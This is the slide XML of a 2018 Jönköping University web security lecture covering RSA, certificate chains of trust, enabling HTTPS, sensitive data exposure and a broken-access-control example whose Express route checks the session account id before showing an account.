      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="34"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Web Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Peter Larsson-Green</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Jönköping University</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Autumn 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1138247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noProof="0" dirty="0"/>
              <a:t>How it works in practice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4859279"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>The encryption algorithm used is called RSA.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>Invented by Ron </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0" err="1"/>
              <a:t>Rivest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>, Adi Shamir and Len </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0" err="1"/>
              <a:t>Adleman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t> 1977.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
              <a:t>Similar algorithm developed by Clifford Cocks 1973, but kept secret.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>RSA is typically only used in the beginning.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Client and server secretly agree on other symmetric encryption algorithm to use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>The two keys work both ways:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
              <a:t>Key B decrypts what has</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
              <a:t>been encrypted by Key A.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
              <a:t>Key A decrypts what has</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
              <a:t>been encrypted by Key B.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>RSA can be used to sign information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If an encryption can be decrypted with the public key,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>it must have been encrypted with the private key.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5912242" y="4334777"/>
            <a:ext cx="4819185"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Client can send messages</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>only the server can read.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Anyone can read messages</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>from the server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109555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60760" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Distributing the encryption keys</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1825625"/>
            <a:ext cx="11160759" cy="2185727"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>How can the asymmetric encryption keys be safely distributed?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Through a chain of trust!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>The web browser knows the encryption keys to some "computers" it trusts...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>...they in turn trusts some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>other "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>computers"...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>...and so on.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1966158" y="3955597"/>
            <a:ext cx="3237746" cy="2531204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410579" y="3779186"/>
            <a:ext cx="3136686" cy="2884026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2999679" y="5096108"/>
            <a:ext cx="1918010" cy="55756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527292" y="4367562"/>
            <a:ext cx="873513" cy="128610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631087" y="4132001"/>
            <a:ext cx="1252830" cy="2132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8753940" y="3779186"/>
            <a:ext cx="3136687" cy="2884026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Content Placeholder 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17469" y="4950512"/>
            <a:ext cx="2072268"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Chrome:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8787393" y="4132000"/>
            <a:ext cx="1252830" cy="2132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863372" y="4367562"/>
            <a:ext cx="1176852" cy="106308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0084827" y="4367561"/>
            <a:ext cx="843368" cy="106308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9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8" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="31" grpId="0" animBg="1"/>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38840" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Distributing the encryption keys</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="2185727"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>How can the asymmetric encryption keys be safely distributed?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Through a chain of trust!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>You know the encryption key to some computers you trust...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...they in turn trusts some computers...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>...and so on.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Content Placeholder 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17469" y="4950512"/>
            <a:ext cx="2072268"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Chrome:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1955921" y="4011352"/>
            <a:ext cx="3453719" cy="2518612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2334605" y="4188755"/>
            <a:ext cx="497805" cy="2124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Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10006361" y="2170953"/>
            <a:ext cx="2185639" cy="1338146"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -74404"/>
              <a:gd name="adj2" fmla="val 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certification authorities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168255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Enable HTTPS on your website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3614323"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Use a Self-Signed Certificate:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Generate your own public/private key pair.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Create a certificate containing your public key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Install it on your web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Send your certificate to all your clients.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Is free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Great for development/testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>For real websites we can't send it to all the clients </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403419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Enable HTTPS on your website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4646400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Use a Trusted Certificate Authority:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>generate your own public/private key pair.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Create a certificate containing your public key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Get it signed by a Certificate Authority (usually costs money).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Install it on your web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Need to use a Certificate Authority our clients trust.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Usually decided by the web browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>ree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t> Certificate Authorities exist, e.g.: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" noProof="0" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://letsencrypt.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Free with AWS Certificate Manager: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" noProof="0" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://aws.amazon.com/certificate-manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380278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4000" noProof="0" dirty="0"/>
              <a:t>#3 Sensitive data exposure Examples</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885371"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are You on Tinder? Someone May Be Watching You Swipe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.checkmarx.com/2018/01/23/tinder-someone-may-watching-swipe-2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17252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#5 Broken Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="2031325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>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endParaRPr lang="en-US" i="1" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211994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#5 Broken Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1640C4B-3F2C-47AB-B188-DC73346D5FE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2371408"/>
            <a:ext cx="10515600" cy="430194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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>app.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('/accounts/:id',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id = request.params.id</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if</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request.session.accountId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> != id){</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response.render</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unauthorized.hbs</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return</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account = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>db.getAccountById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(id,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(account){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response.render</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account.hbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", account)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5BFA1901-A55E-421E-B17B-22117E0673A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="4117339" cy="412749"/>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solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /accounts/3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168561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#5 Broken Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 3">
